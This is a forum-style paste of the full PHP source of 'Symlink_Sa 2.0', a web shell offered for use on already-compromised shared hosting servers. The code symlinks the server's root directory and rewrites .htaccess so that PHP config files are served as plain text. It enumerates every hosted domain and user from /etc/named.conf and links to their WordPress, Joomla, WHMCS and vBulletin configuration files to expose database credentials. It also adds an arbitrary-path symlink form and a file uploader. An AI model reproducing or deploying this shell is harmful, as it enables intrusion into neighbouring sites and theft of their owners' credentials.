Symlink shell (decoded) by Goldenpheonix Ashes

1. **********************************************************************************************************************************************************************************************************************
2. NOTE - This is symlink shell Cod3d by Mr.Alsa3ek and Al-Swisre. It give one click access to all domains and users of all the sites hosted on the shelled webserver and do automated one click symlink. The shell is totally decoded..No backdoors either and you can verify the code from google under title "symlink_sa_2.0" .
3.  
4. Thanks - Goldenpheonix Ashes
5.  
6. **********************************************************************************************************************************************************************************************************************
7.  
8. Code
9.  
10. **********************************************************************************************************************************************************************************************************************
11. <?php
12. $IIIIIIIIIIIl = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
13. $IIIIIIIIIII1=explode('/',$IIIIIIIIIIIl );
14. $IIIIIIIIIIIl =str_replace($IIIIIIIIIII1[count($IIIIIIIIIII1)-1],'',$IIIIIIIIIIIl );
15. ;echo '  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
16.    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
17.  
18. <html xmlns="http://www.w3.org/1999/xhtml">
19.  
20. <head>
21. <title>Symlink_Sa 2.0</title>
22.  
23. <style type="text/css">
24.  
25.  html,body {
26.     margin: 0;
27.     padding: 0;
28.     outline: 0;
29. }
30.  
31.  
32. body {
33.    direction: ltr;
34.    background-color:#F4F4F4;
35.     color: rgb(153, 153, 153);
36.    text-align: center
37. }
38.  
39. input,textarea,select{
40. font-weight: bold;
41. color: #111111;
42. dashed #ffffff;
43. border: 1px
44. solid #BBBBBB;
45. background-color: #DDDDDD;
46. }
47.  
48.  
49. .hedr {
50.  font-family: Tahoma, Arial, sans-serif  ;
51.  font-size: 22px;
52.  
53.  
54. }
55.  
56. .cont a{
57.  
58. text-decoration: none;
59. color:rgb(153, 153, 153);
60. font-family: Tahoma, Arial, sans-serif  ;
61. font-size: 16px;
62. text-shadow: 0px 0px 3px ;
63. }
64.  
65. .cont a:hover{
66.  
67.  
68.  color: #EEEEEE ;
69.  text-shadow:0px 0px 3px #000000 ;
70.  
71.  
72. }
73.  
74. .tmp tr td{
75.  
76. border: solid 1px #BBBBBB;
77.  
78. padding: 2px ;
79.  font-size: 13px;
80. }
81.  
82. .tmp tr td a {
83.  text-decoration: none;
84.  
85.  
86.  
87. }
88.  
89. .foter{
90.  font-size: 9pt;
91.  color: #AAAAAA ;
92.  text-align: center
93. }
94.  
95. .tmp tr td:hover{
96.  
97. box-shadow: 0px 0px 4px #888888;
98.  
99. }
100. .fot{
101.  
102. font-family:Tahoma, Arial, sans-serif;
103.  
104.  font-size: 13pt;
105. }
106.  
107. .ir {
108.  color: #FF0000;
109. }
110.  
111.  
112.  
113. </style>
114.  
115. </head>
116.  
117. <body>
118.  
119. <div class=\'all\'>
120.  
121.  
122. ';
123. @mkdir('sym',0777);
124. $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
125. $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
126. fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
127. @symlink('/','sym/root');
128. $IIIIIIIIIlIl = basename('decrypt.php');
129. echo '<br /><div class="hedr"> Symlink Sa 2.0 <br /></div>';
130. echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>';
131. echo '<div class="cont">
132.  
133. [<a href="?"> Home </a>]
134.  
135. [<a href="?sws=sym"> User & Domains & Symlink </a>]
136.  
137. [<a href="?sws=sec"> Domains & Script </a>]
138.  
139. [ <a href="?sws=file"> Symlink File </a>]<br /><br /><br />
140.  
141.  
142.  
143.  
144.  
145.  
146. </div>';
147. if(isset($_REQUEST['sws']))
148. {
149. switch ($_REQUEST['sws'])
150. {
151. case 'sec':
152. $IIIIIIIIIllI = @file('/etc/named.conf');
153. if(!$IIIIIIIIIllI)
154. {
155. die (" can't read /etc/named.conf");
156. }
157. else
158. {
159. echo "<div class='tmp'>
160. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
161. foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
162. if(eregi('zone',$IIIIIIIIIll1)){
163. preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
164. flush();
165. if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
166. $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
167. $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php';
168. $IIIIIIIII11I=get_headers($IIIIIIIII1l1);
169. $IIIIIIIII11l=$IIIIIIIII11I[0];
170. $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php';
171. $IIIIIIIIlIII=get_headers($IIIIIIIII111);
172. $IIIIIIIIlIIl=$IIIIIIIIlIII[0];
173. $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php';
174. $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1);
175. $IIIIIIIIlIll=$IIIIIIIIlIlI[0];
176. $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php';
177. $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1);
178. $IIIIIIIIlI1l=$IIIIIIIIlI1I[0];
179. $IIIIIIIIlI11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/includes/config.php';
180. $IIIIIIIIllII=get_headers($IIIIIIIIlI11);
181. $IIIIIIIIllIl=$IIIIIIIIllII[0];
182. $IIIIIIIIllI1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/vb/includes/config.php';
183. $IIIIIIIIlllI=get_headers($IIIIIIIIllI1);
184. $IIIIIIIIllll=$IIIIIIIIlllI[0];
185. $IIIIIIIIlll1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/forum/includes/config.php';
186. $IIIIIIIIll1I=get_headers($IIIIIIIIlll1);
187. $IIIIIIIIll1l=$IIIIIIIIll1I[0];
188. $IIIIIIIIll11=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'public_html/clients/configuration.php';
189. $IIIIIIIIl1II=get_headers($IIIIIIIIll11);
190. $IIIIIIIIl1Il=$IIIIIIIIl1II[0];
191. $IIIIIIIIl1I1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/support/configuration.php';
192. $IIIIIIIIl1II=get_headers($IIIIIIIIl1I1);
193. $IIIIIIIIl1lI=$IIIIIIIIl1II[0];
194. $IIIIIIIIl1ll=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
195. $IIIIIIIIl1l1=get_headers($IIIIIIIIl1ll);
196. $IIIIIIIIl11I=$IIIIIIIIl1l1[0];
197. $IIIIIIIIl11l=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/submitticket.php';
198. $IIIIIIIIl111=get_headers($IIIIIIIIl11l);
199. $IIIIIIII1III=$IIIIIIIIl111[0];
200. $IIIIIIII1IIl=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/client/configuration.php';
201. $IIIIIIII1II1=get_headers($IIIIIIII1IIl);
202. $IIIIIIII1IlI=$IIIIIIII1II1[0];
203. $IIIIIIII1Ill = strpos($IIIIIIIII11l,'200');
204. $IIIIIIII1I1I='&nbsp;';
205. if (strpos($IIIIIIIII11l,'200') == true )
206. {
207. $IIIIIIII1I1I="<a href='".$IIIIIIIII1l1."' target='_blank'>Wordpress</a>";
208. }
209. elseif (strpos($IIIIIIIIlIIl,'200') == true)
210. {
211. $IIIIIIII1I1I="<a href='".$IIIIIIIII111."' target='_blank'>Wordpress</a>";
212. }
213. elseif (strpos($IIIIIIIIlIll,'200')  == true and strpos($IIIIIIII1III,'200')  == true )
214. {
215. $IIIIIIII1I1I=" <a href='".$IIIIIIIIl11l."' target='_blank'>WHMCS</a>";
216. }
217. elseif (strpos($IIIIIIIIl1lI,'200')  == true)
218. {
219. $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1I1."' target='_blank'>WHMCS</a>";
220. }
221. elseif (strpos($IIIIIIIIl11I,'200')  == true)
222. {
223. $IIIIIIII1I1I =" <a href='".$IIIIIIIIl1ll."' target='_blank'>WHMCS</a>";
224. }
225. elseif (strpos($IIIIIIIIlIll,'200')  == true)
226. {
227. $IIIIIIII1I1I=" <a href='".$IIIIIIIIlII1."' target='_blank'>Joomla</a>";
228. }
229. elseif (strpos($IIIIIIIIlI1l,'200')  == true)
230. {
231. $IIIIIIII1I1I=" <a href='".$IIIIIIIIlIl1."' target='_blank'>Joomla</a>";
232. }
233. elseif (strpos($IIIIIIIIllIl,'200')  == true)
234. {
235. $IIIIIIII1I1I=" <a href='".$IIIIIIIIlI11."' target='_blank'>vBulletin</a>";
236. }
237. elseif (strpos($IIIIIIIIllll,'200')  == true)
238. {
239. $IIIIIIII1I1I=" <a href='".$IIIIIIIIllI1."' target='_blank'>vBulletin</a>";
240. }
241. elseif (strpos($IIIIIIIIll1l,'200')  == true)
242. {
243. $IIIIIIII1I1I=" <a href='".$IIIIIIIIlll1."' target='_blank'>vBulletin</a>";
244. }
245. else
246. {
247. continue;
248. }
249. $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
250. echo '<tr><td><a href=http://www.'.$IIIIIIIIIl11[1][0].'/>'.$IIIIIIIIIl11[1][0].'</a></td>
251. <td>'.$IIIIIIII1I1I.'</td></tr>';flush();
252. }
253. }
254. }
255. }
256. break;
257. case 'sym':
258. $IIIIIIIIIllI = @file('/etc/named.conf');
259. if(!$IIIIIIIIIllI)
260. {
261. die (" can't read /etc/named.conf");
262. }
263. else
264. {
265. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
266. foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
267. if(eregi('zone',$IIIIIIIIIll1)){
268. preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
269. flush();
270. if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
271. $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
272. $IIIIIIII1I1l = $IIIIIIIII1I1['name'] ;
273. @symlink('/','sym/root');
274. $IIIIIIII1I1l = $IIIIIIIIIl11[1][0];
275. $IIIIIIII1I11 = '\.ir';
276. $IIIIIIII1lII = '\.il';
277. if (eregi("$IIIIIIII1I11",$IIIIIIIIIl11[1][0]) or eregi("$IIIIIIII1lII",$IIIIIIIIIl11[1][0]) )
278. {
279. $IIIIIIII1I1l = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$IIIIIIIIIl11[1][0].'</div>';
280. }
281. echo "
282. <tr>
283.  
284. <td>
285. <div class='dom'><a target='_blank' href=http://www.".$IIIIIIIIIl11[1][0].'/>'.$IIIIIIII1I1l.' </a> </div>
286. </td>
287.  
288.  
289. <td>
290. '.$IIIIIIIII1I1['name']."
291. </td>
292.  
293.  
294.  
295.  
296.  
297.  
298. <td>
299. <a href='sym/root/home/".$IIIIIIIII1I1['name']."/public_html' target='_blank'>symlink </a>
300. </td>
301.  
302.  
303. </tr></div> ";
304. flush();
305. }
306. }
307. }
308. }
309. break;
310. case 'file':
311. echo '
312. The file path to symlink
313.  
314. <br /><br />
315. <form method="post">
316. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
317. <input type="text" name="symfile" value="file.name_sym ( Ex. :: 1.txt )" size="60"/><br /><br />
318. <input type="submit" value="symlink" name="symlink" /> <br /><br />
319.  
320.  
321.  
322. </form>
323. ';
324. $IIIIIIII1lIl = $_POST['file'];
325. $symfile = $_POST['symfile'];
326. $symlink = $_POST['symlink'];
327. if ($symlink)
328. {
329. @symlink("$IIIIIIII1lIl","sym/$symfile");
330. echo '<br /><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a>';
331. }
332. break;
333. default:
334. header("Location: $IIIIIIIIIlIl");
335. }
336. }else
337. {
338. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
339. echo '<input type="file" name="file" value="Choose file" size="60" ><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
340. if( $_POST['_upl'] == 'Upload') {
341. if(@copy($_FILES['file']['tmp_name'],$_FILES['file']['name'])) {echo '<br /><br /><b>Uploaded successful !!<br><br>';}
342. else {echo '<br /><br />Not uploaded !!<br><br>';}
343. }
344. echo '
345. <br /><br /><div class="fot">Cod3d by Mr.Alsa3ek and Al-Swisre
346. <br /><br />
347. Muslims Hackers</div> ';
348. }
349. ;echo '
350.  
351. </div>
352.  
353.  
354. </body>
355.  
356. </html>
357. ';
358.  
359. **********************************************************************************************************************************************************************************************************************